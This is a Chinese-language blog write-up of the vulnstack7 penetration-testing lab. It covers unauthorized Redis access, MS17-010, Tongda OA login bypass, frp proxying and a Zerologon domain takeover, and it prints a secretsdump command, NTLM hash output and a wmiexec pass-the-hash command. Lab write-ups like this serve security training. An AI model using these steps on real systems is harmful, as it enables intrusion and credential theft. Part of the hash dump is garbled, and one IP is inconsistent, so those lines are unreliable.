vulnstack7 writeup

2023-10-10 14:47:52

环境配置

靶场http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

WEB1(ubuntu):
双网卡
192.168.1.15
192.168.52.10

PC1:
双网卡
192.168.52.30
192.168.93.20

WEB2(ubuntu):
双网卡
192.168.52.20
192.168.93.10

PC2:
192.168.93.40

域控:
192.168.93.30

开始打靶

扫描端口发现redis

redis未授权,使用工具进行图形化写入公钥

https://github.com/qishibo/AnotherRedisDesktopManager/releases/tag/v1.5.1

vulnstack7 writeup

用kali进行连接,成功获取root权限并且发现网段192.168.52.10

vulnstack7 writeup

vulnstack7 writeup

用msf上传fscan对192.168.52.0/24进行扫描

vulnstack7 writeup

发现192.168.52.30存在通达oa以及ms17010

192.168.52.20:8000 为Laravel

192.168.52.10:81 端口也为Laravel,推测为nginx的反向代理

先搞192.168.52.30

在主机192.168.52.10上 做frp代理

vulnstack7 writeup

测试下代理,没有问题

vulnstack7 writeup

两个方向:

1、通达oa漏洞

这个直接在windows上搞

访问http://192.168.52.30:8080/,利用通达oa任意用户登录进入后台

vulnstack7 writeup

进入后台发现试用期过了,尬住了

vulnstack7 writeup

这条线先放下,搞ms17010

2、MS17010

用kali proxychains走代理

vulnstack7 writeup

成功获取win7主机权限

vulnstack7 writeup

发现双网卡,通192.168.93.0/24,发现域whoamianony.org

vulnstack7 writeup

然后发现msf有点玩不明白,因为主机出网,换cs

vulnstack7 writeup

获取域用户账号密码

vulnstack7 writeup

横向发现192.168.93.30,40

vulnstack7 writeup

确定域控为192.168.93.30,40为域内另一台主机,存在ms17010

用20做代理,先打一下40

成功获取主机权限,但发现其不出网,所以用20做中转上线cs

vulnstack7 writeup

vulnstack7 writeup

下一步打域控,用到漏洞CVE-2020-1472

利用工具地址

https://github.com/VoidSec/CVE-2020-1472

vulnstack7 writeup

python3 secretsdump.py whoamianony/DC\$@192.168.83.30 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.org\bunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.org\moretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC : 1002 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 31 d 6 c f e 0 d 16 a e 931 b 73 c 59 d 7 e 0 c 089 c 0 : : : P C 2 :1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: PC2 :1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::PC2:1113:aad3b435b51404eeaad3b435b51404ee:cda321ff9d86cdce7e989cef83ef9f3a:::

proxychains wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30

获取域控权限
vulnstack7 writeup

上一篇:iOS中如何让TextView和TextField控件支持return键收起输入法


下一篇:js 循环li添加点击事件 (闭包的应用)